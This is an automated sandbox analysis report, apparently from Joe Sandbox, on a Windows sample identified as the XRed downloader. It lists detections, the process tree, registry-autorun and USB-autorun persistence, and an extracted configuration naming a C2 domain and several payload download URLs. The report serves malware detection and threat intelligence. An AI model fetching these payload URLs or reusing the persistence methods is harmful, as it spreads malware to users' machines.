Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1583477
MD5:e819c37952e89ff0f473fa9b59cd771d
SHA1:de2a344ed3a2b1f4e0fbd4e684170db56903763e
SHA256:05f954e37982086a48a222726b8134fbef0caa78dbe1b66a3d4479b712d12012
Tags:exeuser-jstrosch
Infos:

Detection

XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E819C37952E89FF0F473FA9B59CD771D)
    • ._cache_file.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\._cache_file.exe" MD5: 630D75210B325A280C3352F879297ED5)
      • Setup.exe (PID: 7724 cmdline: c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe MD5: 006F8A615020A4A17F5E63801485DF46)
        • wordpad.exe (PID: 4712 cmdline: "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p MD5: 61173FF6ABB1C40E3D3B580126FC5F66)
          • splwow64.exe (PID: 2876 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
        • wordpad.exe (PID: 3560 cmdline: "C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p MD5: 61173FF6ABB1C40E3D3B580126FC5F66)
    • Synaptics.exe (PID: 7712 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 7407C51DD7AC30C4D79658D991A8B5D6)
      • WerFault.exe (PID: 8540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 3860 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7764 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • Synaptics.exe (PID: 5724 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 7407C51DD7AC30C4D79658D991A8B5D6)
  • cleanup

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_XRedYara detected XRedJoe Security
    file.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Synaptics\RCX3CE.tmpJoeSecurity_XRedYara detected XRedJoe Security
        C:\ProgramData\Synaptics\RCX3CE.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\Users\user\Documents\AFWAAFRXKO\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
            C:\Users\user\Documents\AFWAAFRXKO\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\ProgramData\Synaptics\Synaptics.exeJoeSecurity_XRedYara detected XRedJoe Security
                Click to see the 1 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                      Process Memory Space: file.exe PID: 7568JoeSecurity_XRedYara detected XRedJoe Security
                        Process Memory Space: Synaptics.exe PID: 7712JoeSecurity_XRedYara detected XRedJoe Security

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.file.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            0.0.file.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7568, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Sigma detected: Office Macro File Creation
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7712, TargetFilename: C:\Users\user\AppData\Local\Temp\ofbduaaa.xlsm

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-02T20:29:37.136706+010020448871A Network Trojan was detected192.168.2.949788172.217.18.14443TCP
                              2025-01-02T20:29:37.224164+010020448871A Network Trojan was detected192.168.2.949789172.217.18.14443TCP
                              2025-01-02T20:29:38.412011+010020448871A Network Trojan was detected192.168.2.949802172.217.18.14443TCP
                              2025-01-02T20:29:38.423454+010020448871A Network Trojan was detected192.168.2.949804172.217.18.14443TCP
                              2025-01-02T20:29:39.478865+010020448871A Network Trojan was detected192.168.2.949814172.217.18.14443TCP
                              2025-01-02T20:29:39.492141+010020448871A Network Trojan was detected192.168.2.949813172.217.18.14443TCP
                              2025-01-02T20:29:40.531218+010020448871A Network Trojan was detected192.168.2.949825172.217.18.14443TCP
                              2025-01-02T20:29:40.532057+010020448871A Network Trojan was detected192.168.2.949824172.217.18.14443TCP
                              2025-01-02T20:29:41.980642+010020448871A Network Trojan was detected192.168.2.949844172.217.18.14443TCP
                              2025-01-02T20:29:42.044430+010020448871A Network Trojan was detected192.168.2.949842172.217.18.14443TCP
                              2025-01-02T20:29:43.063109+010020448871A Network Trojan was detected192.168.2.949855172.217.18.14443TCP
                              2025-01-02T20:29:43.113496+010020448871A Network Trojan was detected192.168.2.949856172.217.18.14443TCP
                              2025-01-02T20:29:44.264089+010020448871A Network Trojan was detected192.168.2.949865172.217.18.14443TCP
                              2025-01-02T20:29:44.267953+010020448871A Network Trojan was detected192.168.2.949868172.217.18.14443TCP
                              2025-01-02T20:29:45.869946+010020448871A Network Trojan was detected192.168.2.949890172.217.18.14443TCP
                              2025-01-02T20:29:45.891107+010020448871A Network Trojan was detected192.168.2.949891172.217.18.14443TCP
                              2025-01-02T20:29:47.000058+010020448871A Network Trojan was detected192.168.2.949902172.217.18.14443TCP
                              2025-01-02T20:29:47.054328+010020448871A Network Trojan was detected192.168.2.949901172.217.18.14443TCP
                              2025-01-02T20:29:48.053490+010020448871A Network Trojan was detected192.168.2.949910172.217.18.14443TCP
                              2025-01-02T20:29:48.136029+010020448871A Network Trojan was detected192.168.2.949912172.217.18.14443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-01-02T20:29:37.480368+010028326171Malware Command and Control Activity Detected192.168.2.94979769.42.215.25280TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: file.exeAvira: detected
                              Source: file.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://xred.site50.net/syn/SUpdate.iniZAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SUpdate.iniH)kAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/Synaptics.rarZAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dlpAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dll6Avira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCX3CE.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCX3CE.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Found malware configuration
                              Source: file.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCX3CE.tmpReversingLabs: Detection: 93%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\Documents\AFWAAFRXKO\~$cache1ReversingLabs: Detection: 93%
                              Multi AV Scanner detection for submitted file
                              Source: file.exeReversingLabs: Detection: 92%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.4% probability
                              Machine Learning detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCX3CE.tmpJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: file.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01004F6B InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,CloseHandle,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,2_2_01004F6B
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010045EB GetFileAttributesA,LoadLibraryA,GetProcAddress,DecryptFileA,GetLastError,2_2_010045EB
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C9017D1 __EH_prolog3,GetLastError,CertCloseStore,CryptMsgClose,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,4_2_6C9017D1
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8E8083 CryptQueryObject,4_2_6C8E8083
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8E8094 CryptMsgGetAndVerifySigner,4_2_6C8E8094
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8E80A5 CryptHashPublicKeyInfo,SetLastError,4_2_6C8E80A5
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8E80D5 CryptMsgGetParam,SetLastError,4_2_6C8E80D5
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8E8114 CryptDecodeObject,SetLastError,4_2_6C8E8114
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeWindow detected: MICROSOFT SOFTWARE LICENSE TERMSMICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIESThese license terms are an agreement between Microsoft Corporation (or based on where you live one of its affiliates) and you. Please read them. They apply to the software named above which includes the media on which you received it if any. The terms also apply to any MicrosoftupdatessupplementsInternet-based services and support servicesfor this software unless other terms accompany those items. If so those terms apply.BY USING THE SOFTWARE YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM DO NOT USE THE SOFTWARE.If you comply with these license terms you have the rights below.1.INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices.2.Scope of License. The software is licensed not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation you may use the software only as expressly permitted in this agreement. In doing so you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may notdisclose the results of any benchmark tests of the software to any third party without Microsofts prior written approval;work around any technical limitations in the software;reverse engineer decompile or disassemble the software except and only to the extent that applicable law expressly permits despite this limitation;make more copies of the software than specified in this agreement or allowed by applicable law despite this limitation;publish the software for others to copy;rent lease or lend the software;transfer the software or this agreement to any third party; oruse the software for commercial software hosting services.3.BACKUP COPY. You may make one backup copy of the software. You may use it only to reinstall the software.4.DOCUMENTATION. Any person that has valid access to your computer or internal network may copy and use the documentation for your internal reference purposes.5.Export Restrictions. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on desusertions end users and end use. For additional information see www.microsoft.com/exporting <http://www.microsoft.com/exporting>.6.SUPPORT SERVICES. Because this software is as is we may not provide support services for it.7.Entire Agreement. This agreement and the terms for supplements updates Internet-based services and support services that you use are the entire agreement for the software and support services.8.Applicable Law.a.United States. If you acquired the software in the United States Washington state law governs the interpretation of this agreement and applies to claims for breach of it regardless of conflict
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1033\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1041\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1042\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1028\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\2052\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1040\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1036\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1031\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\3082\eula.rtfJump to behavior
                              Source: C:\Users\user\Desktop\._cache_file.exeFile created: c:\36a8a8e2fed651ec27d1eed188bb35\1049\eula.rtfJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49803 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49804 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49805 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49824 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49844 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49842 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49865 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49868 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49890 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49891 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49900 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49903 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49902 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49901 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49924 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49927 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49946 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49959 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49961 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49985 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:49988 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50007 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50012 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50023 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50022 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50034 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50033 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50044 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50046 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50063 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50064 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50073 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50075 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50076 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50074 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50083 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50086 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50115 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50116 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50123 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50126 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50133 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50134 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50143 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50144 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50145 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50147 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.9:50149 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50155 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50157 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50165 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50166 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50170 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.9:50171 version: TLS 1.2
                              Source: Binary string: sfxcab.pdb source: file.exe, ._cache_file.exe.0.dr, Synaptics.exe.0.dr
                              Source: Binary string: sqmapi.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, sqmapi.dll.2.dr
                              Source: Binary string: SetupEngine.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, SetupEngine.dll.2.dr
                              Source: Binary string: patchhooks.pdb source: vc_red.msi.2.dr
                              Source: Binary string: Setup.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2623419946.0000000000291000.00000020.00000001.01000000.00000008.sdmp, Setup.exe, 00000004.00000000.1389333890.0000000000291000.00000020.00000001.01000000.00000008.sdmp, Setup.exe.2.dr
                              Source: Binary string: SetupUi.pdb source: Setup.exe, Setup.exe, 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, SetupUi.dll.2.dr
                              Source: Binary string: SetupResources.pdb source: SetupResources.dll4.2.dr, SetupResources.dll3.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll8.2.dr
                              Source: file.exe, 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: file.exe, 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: file.exe, 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: file.exeBinary or memory string: [autorun]
                              Source: file.exeBinary or memory string: [autorun]
                              Source: file.exeBinary or memory string: autorun.inf
                              Source: RCX3CE.tmp.0.drBinary or memory string: [autorun]
                              Source: RCX3CE.tmp.0.drBinary or memory string: [autorun]
                              Source: RCX3CE.tmp.0.drBinary or memory string: autorun.inf
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010046B9 SendDlgItemMessageA,strstr,SetFileAttributesA,GetLastError,CopyFileA,SendDlgItemMessageA,strstr,SetFileAttributesA,CopyFileA,GetLastError,CopyFileA,SetFileAttributesA,SendDlgItemMessageA,_strlwr,GetLastError,MoveFileA,MoveFileA,_strlwr,strstr,FindFirstFileA,strrchr,SendDlgItemMessageA,DeleteFileA,Sleep,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,strchr,strrchr,SendDlgItemMessageA,2_2_010046B9
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5E8097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_6C5E8097
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C5D4281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_6C5D4281
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8D5B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_6C8D5B82
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exeCode function: 4_2_6C8D410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_6C8D410A
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
